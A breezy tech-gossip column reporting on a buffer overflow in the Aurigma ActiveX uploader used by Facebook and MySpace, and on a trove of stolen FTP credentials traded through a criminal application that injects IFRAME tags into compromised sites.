Tech Bitch

Word on the street is that buffer overflows are at the heart of a series of hacks against Facebook and MySpace.

I tapped a man in a white coat at Fortify Software and he said a buffer overflow enabled hackers to exploit the Aurigma ActiveX image uploading software used by these two - and other - social networking sites.

He said the bad news is that this exploit is being used in a hacker toolkit currently being offered for download on several Chinese language hacker sites, meaning that novices have been able to stage these attacks, and not just professional hackers. The good news is that anyone out of college won’t be affected.

Criminal hackers now view these social networking sites as their best target for attacks. Part of the reason for this is that the sites are designed to be usable by ‘unsophisticated’ consumers. You callin’ me thick? This means that the barrier to entry for attacks is potentially lower, as users are more likely to click on a link that leads them to malware.

Social networking sites can no longer restrict their concerns solely to their own security practices, but now take in the practices of their suppliers. Had Facebook and MySpace required Aurigma to provide a proof of a code audit before sourcing the plug-in, this latest security issue could have been avoided.

A database containing more than 8700 harvested FTP account credentials, including username, password and server address has been uncovered. These stolen credentials enable criminals to compromise servers and automatically inject crimeware to infect users visiting them. We’re all gonna die!

Among those stolen accounts are those of Fortune-level global companies in a wide range of industries including manufacturing, telecom, media, online retail, IT, as well as government agencies. The stolen FTP accounts include some of the world’s top 100 domains as ranked by Alexa.com.

The plot thickens. Details have emerged of the workings of an insidious new application, especially designed to abuse and trade stolen FTP account credentials of legitimate companies around the world. A trading interface is used to qualify the stolen accounts in terms of country of residence of the FTP server and Google page ranking of the compromised server.

This information enables cunning cybercriminals to devise cost for the compromised FTP credentials for resale to other cybercriminals or to adjust the attack on more prominent sites. The trading application also allows the cybercriminal to manage FTP credential information to automatically inject IFRAME tags to Web pages on the compromised server.

Software-as-a-Service has been evolving for sometime, but until now, it has been applied only to legitimate applications. With this new trading application, cybercriminals have an instant ‘solution’ to their ‘problem’ of gaining access to FTP credentials and thus infecting both the legitimate Web sites and its unsuspecting visitors. All of this can be easily achieved with just one push of a button.